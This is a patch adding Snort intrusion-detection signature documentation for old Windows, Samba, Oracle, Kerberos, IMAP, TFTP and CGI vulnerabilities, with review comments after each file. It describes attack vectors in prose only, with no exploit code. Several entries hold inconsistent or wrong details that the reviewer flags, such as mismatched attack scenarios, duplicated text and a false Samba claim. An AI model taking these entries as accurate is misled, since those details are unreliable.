+++ b/doc/signatures/3396.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3396
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
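Review bot: the Attack Scenarios paragraph (`An attacker may make a request for a file with an overly long filename via a network share.`) does not match the Detailed Information, which describes malformed DCOM requests sent over RPC; reconcile the two so the reader knows which request the rule inspects. `Expoit code exists` should be "Exploit". Additional References is empty for a widely documented vulnerability; add the Microsoft bulletin. Note also that this text is repeated verbatim as 3162.txt later in this patch, so neither file says what distinguishes the two SIDs.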
--- /dev/null
+++ b/doc/signatures/2567.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2567
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
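Review bot: `running ona web server` should read "running on a web server". More importantly, nothing in the file identifies the script, parameter or request the rule matches, so the Detailed Information is generic boilerplate (the same paragraphs reappear verbatim in 100000390.txt and 100000409.txt), and the Attack Scenarios text about supplying credentials to "an authentication mechanism" does not follow from a CGI exploit rule. State the matched request and trim the unrelated text; Additional References is empty.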
--- /dev/null
+++ b/doc/signatures/1061.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1061
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
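Review bot: the only reference, `NGS Whitepaper - Advanced SQL Injection`, is not connected to anything in the body, which never mentions SQL, a database or the request pattern the rule matches; either describe what the rule detects so the reference makes sense, or drop it. The URL also lacks a scheme (`www.nextgenss.com/papers/advanced_sql_injection.pdf`), unlike every other reference in this patch.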
--- /dev/null
+++ b/doc/signatures/518.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+518
+
+--
+
+Summary:
+This event is generated when a TFTP PUT request is made.  This is an indication that someone is attempting to create or place a file on the server.
+
+--
+
+Impact:
+A TFTP PUT requests allows a remote attacker to create, modify, or replace files on the server running TFTP.  If the TFTP server allows anonymous TFTP PUT requests it could be possible to upload malicious files and payloads to the server.
+
+--
+
+Detailed Information:
+This rule will generate an event on in-bound TFTP PUT requests.  Attackers my use TFTP to upload and download files from a server that is properly or improperly configured.  This could result in malicious payload being uploaded to the server or sensitive files being downloaded.
+
+--
+
+Attack Scenarios:
+Attackers may use TFTP to upload and download files from server that are properly or improperly configured.  Normally attackers attempt to locate TFTP servers using automated scanners and tools.  Once a TFTP server is located an attempt to write files and get files from the TFTP server is made.  Depending on the results of those tests attackers may attempt to further exploit that system, by overwriting system files or downloading password files to access the system.
+
+--
+
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large subnets for improperly configured TFTP servers.
+
+--
+
+False Positives:
+Legitimate TFTP PUT requests for updating routers or other access devices may trigger this rule.  
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+The TFTP server should be configured to only allow PUT requests from trusted locations.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+--
+
+Additional References
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0183
+http://www.whitehats.com/info/IDS148
+
+
+--
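Review bot: this file omits the Affected Systems section that every other entry in this patch carries between Detailed Information and Attack Scenarios; add it, even if only "Any host running a TFTP server". Grammar: `A TFTP PUT requests allows` should be "A TFTP PUT request allows", and `Attackers my use TFTP` should be "Attackers may use TFTP". The Corrective Action ("only allow PUT requests from trusted locations") should say how that is enforced: the text itself notes servers accept anonymous PUT, so the restriction has to come from the server's write-permission configuration or a packet filter in front of it, and disabling PUT entirely is the better default where uploads are not needed. `Additional References` is missing its colon.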
--- /dev/null
+++ b/doc/signatures/3035.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3035
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
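Review bot: the statement that Samba is available "as a client for Microsoft Windows systems" is wrong; Samba provides server and client software for UNIX/Linux, and Windows uses its own SMB/CIFS client. Detailed Information describes an integer overflow in memory allocation while Attack Scenarios says the attacker must "overflow a buffer containing the information for the access control lists"; make it clear these are the same issue (an integer overflow in a size computation that leads to an undersized buffer). Typos: `heterogenous` should be "heterogeneous", and `remote server.The problem` is missing a space. Additional References is empty; add the Samba advisory so the patch advice is actionable.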
--- /dev/null
+++ b/doc/signatures/2578.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2578
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a heap overflow
+associated with Kerberos V5.
+
+--
+Impact:
+A successful attack may cause a heap overflow, permitting the execution of
+arbitrary code.
+
+--
+Detailed Information:
+When Kerberos V5 uses a non-default configuration of enabling rules-based
+mapping, it is possible to cause a heap overflow and the subsequent
+execution of arbitrary code on the vulnerable host.  The attacker has
+to successfully authenticate in order to exploit the vulnerability.
+If an attacker supplies an overly long principal name, it may be possible
+to cause a heap overflow on the vulnerable Kerberos-enabled server.
+
+--
+Affected Systems:
+MIT Kerberos V5 including krb5-1.3.3
+
+--
+Attack Scenarios:
+An attacker authenticates to the Kerberos server and later supplies
+an overly long principle name when attempting to connect to a server
+that employs Kerberos authentication. This can cause a heap overflow
+and subsequent execution of code on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Dan Roelker <dan.roelker@sourcefire.com>
+
+--
+Additional References
+
+Other:
+http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2004-001-an_to_ln.txt
+
+--
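Review bot: `principle name` in Attack Scenarios should be "principal name" (Detailed Information already has it right). The Affected Systems entry `MIT Kerberos V5 including krb5-1.3.3` gives no version range; the linked advisory covers the an_to_ln mapping issue, so state the affected and fixed versions from it. `Additional References` is missing its colon.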
--- /dev/null
+++ b/doc/signatures/2119.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2119
+
+--
+Summary:
+This event is generated when a remote user uses the IMAP RENAME command
+to send a suspiciously long string to port 143 on an internal server.
+This may indicate an attempt to exploit a buffer overflow vulnerability
+in the IMAP RENAME command. This may also affect other IMAP implementations.
+
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the
+RENAME command, a buffer overflow condition may occur. This can allow
+the attacker to access the shell, where arbitrary code can be executed.
+Note that this exploit can only be attempted by a user with a valid IMAP
+account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264. 
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long RENAME command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
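Review bot: the `--` separator is missing between the Summary block and `Impact:`; every other file in this patch has one, and tooling that splits on the separator will merge the two sections. Additional References is empty although Affected Systems names specific UW imapd versions (`10.234 or 12.264`); add the advisory those versions come from. The Summary's closing "This may also affect other IMAP implementations" contradicts the narrow Affected Systems entry; either list the other implementations or drop the sentence.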
--- /dev/null
+++ b/doc/signatures/2978.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2978
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
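Review bot: Corrective Action blocks only `tcp port 139`, but the same share is reachable over direct-hosted SMB on tcp/445, which the 3396.txt entry in this patch already lists alongside 135 and 139; block both. "Windows hosts" under Affected Systems is too broad for text that says the `%DRIVE_LETTER% + $` shares exist "by default"; name the Windows families that actually create them.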
--- /dev/null
+++ b/doc/signatures/2626.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2626
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "send_old_value" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck91.html
+Action:
+
+--
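Review bot: the Corrective Action heading is split in two: the sentence starts as `Corrective Ensure the system is using an up to date version of the software and has`, and a stranded `Action:` line appears after the references. Restore `Corrective Action:` on its own line before the sentence and delete the stray line. `a Oracle database implementation` should be "an Oracle database implementation". The ORACLE_PORTS advice is given only "If you are running Oracle on a Windows server", while the earlier Oracle entry in this patch says a new port is negotiated after the initial connect message regardless of platform; either explain why Windows is singled out or give the advice unconditionally.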
--- /dev/null
+++ b/doc/signatures/100000390.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000390
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "vacadmb.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "vacadmb.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
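Review bot: the third Detailed Information paragraph and the Attack Scenarios text are credential-checking boilerplate that has nothing to do with a remote file include through `babInstallPath`; an RFI does not involve "an authentication mechanism". Keep the first two paragraphs and describe the actual vector: a URL supplied in the parameter is included and executed by the PHP interpreter on the server. Also fix `running ona web server` and the redundant "an exploitation attempt has been attempted".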
--- /dev/null
+++ b/doc/signatures/2089.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2089
+
+--
+Summary:
+vulnerability in the rcp service ypupdated.
+
+--
+Impact:
+Information disclosure and possible code execution.
+
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The ypupdated service is used in conjunction with NIS servers to 
+remotely update changes made in NIS databases.
+
+On recieving a request the yupdated service executes a make command 
+using the Bourne shell. It is possible to execute code using 
+metacharacters in the request.
+
+Commands and code after the metacharacters in the request will be 
+executed with the privileges of the super user on the vulnerable system.
+
+--
+Affected Systems:
+	HP-UX 10.1, 10.10 and 10.20
+	
+	IBM AIX 3.2 and 4.1
+	
+	NEC EWS-UX/V (Rel4.2MP), (Rel4.2)
+	NEC UP-UX/V (Rel4.2MP)
+	NEC UX/4800 (64)
+	
+	SGI IRIX 3.2, 3.3, 3.3.1, 3.3.2, 3.3.3
+	SGI IRIX 4.0, 4.0.1 T, 4.0.1,4.0.2, 4.0.3, 4.0.4 T, 4.0.4 B, 4.0.4, 4.0.5 IPR, 4.0.5 H, 4.0.5 G, 4.0.5 F, 4.0.5 E, 4.0.5 D, 4.0.5 A, 4.0.5 (IOP), 4.0.5
+	SGI IRIX 5.0, 5.0.1, 5.1, 5.1.1, 5.2, 5.3 XFS, 5.3
+	SGI IRIX 6.0, 6.0.1 XFS, 6.0.1
+	
+	Sun SunOS 4.1 PSR_A, 4.1, 4.1.1, 4.1.2, 4.1.3 c, 4.1.3 _U1, 4.1.3, 4.1.4 -JL, 4.1.4
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypupdated service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypupdated daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1749
+
+--
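Review bot: the Summary is truncated and starts mid-sentence (`vulnerability in the rcp service ypupdated.`), and it says "rcp" where the rest of the file says rpc. Detailed Information describes shell metacharacter injection into the make command, but Attack Scenarios says the request must contain "a long username", which is a different bug class; reconcile the two. Typos: `recieving`, `yupdated`, `pacthes`.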
--- /dev/null
+++ b/doc/signatures/3162.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3162
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
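Review bot: this file is identical to 3396.txt earlier in the patch, including the mismatched Attack Scenarios paragraph, the `Expoit` typo and the empty references. Documentation for two different SIDs must at least say what each rule matches; as written an analyst seeing 3162 learns nothing that distinguishes it from 3396. Fix the shared defects once and then differentiate the two entries.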
--- /dev/null
+++ b/doc/signatures/1430.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1430
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerabilty on a Sun Solaris system.
+
+--
+Impact:
+Remote root access.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in /bin/login when used by telnetd on Sun Solaris sytems.
+A buffer overflow condition is present in /bin/login used by telnetd
+that may present an attacker with the opportunity to execute code of
+their choosing after a sucessful exploit.
+
+--
+Affected Systems:
+	Sun Solaris 8.x and earlier
+
+--
+Attack Scenarios:
+An attacker may utilize one of the available exploit scripts.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
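Review bot: typos `vulnerabilty`, `sytems`, `sucessful`; `Upgrade to the latest non-affected version of the software` lacks a full stop. Attack Scenarios ("may utilize one of the available exploit scripts") says nothing about how the attack works; since Detailed Information names /bin/login as used by telnetd, state that the overflow is triggered during the telnet login exchange, before any credentials are checked. Additional References is empty for a vulnerability the text says has public exploit scripts; add the vendor or CERT advisory.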
--- /dev/null
+++ b/doc/signatures/1732.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1732
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rwalld is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rwalld is using.  Attackers can also learn what versions of the rwalld protocol are accepted by rwalld. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rwalld run.  The rwalld RPC service is used by UNIX hosts to send a message to current users on the host.  There is a format string vulnerability associated with rwalld error messages, allowing an attacker to execute abitrary code with the privileges of rwalld, possibly root. According to CERT, this is both a local and remote exploit, but the remote exploit is more difficult to perform.
+
+--
+Affected Systems:
+Sun Solaris 2.5.1, 2.6, 7, and 8
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rwalld runs.  This may be a precursor to an attack to exploit the rwalld format string vulnerability.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rwalld, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rwalld, not probes of the rwalld service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rwalld service itself. An attacker may attempt to go directly to the rwalld port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-10.html
+
+
+--
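Review bot: typo in Detailed Information: "execute abitrary code" should read "execute arbitrary code". Two smaller points in the same file: the Summary paragraph is followed by two blank lines where every other section uses one, and Affected Systems lists only "Sun Solaris 2.5.1, 2.6, 7, and 8" although the False Negatives text makes clear the rule fires on any portmap GETPORT probe for rwalld regardless of platform; if the Solaris list is meant to be the systems vulnerable to the CA-2002-10 format string bug, say so, and state that the rule itself triggers for any host running portmapper.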
--- /dev/null
+++ b/doc/signatures/100000409.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000409
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "AssoCIateD" application running on a webserver. Access to the file "gallery_functions.php" using a remote file being passed as the "root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root_path" parameter in the "gallery_functions.php" script used by the "AssoCIateD" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using AssoCIateD
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
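Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host ...") is generic CGI-authentication boilerplate that has nothing to do with a remote file include via the "root_path" parameter; drop it or rewrite it around the RFI, which the first paragraph already describes. Smaller points: "an exploitation attempt has been attempted" in the Summary is redundant (write "an exploitation attempt has been made"), "running ona web server" is missing a space, "attackers choosing" needs an apostrophe, and Additional References is empty even though Ease of Attack claims "Exploits exist"; cite the advisory the rule was derived from.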
--- /dev/null
+++ b/doc/signatures/2893.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2893
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_raw
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
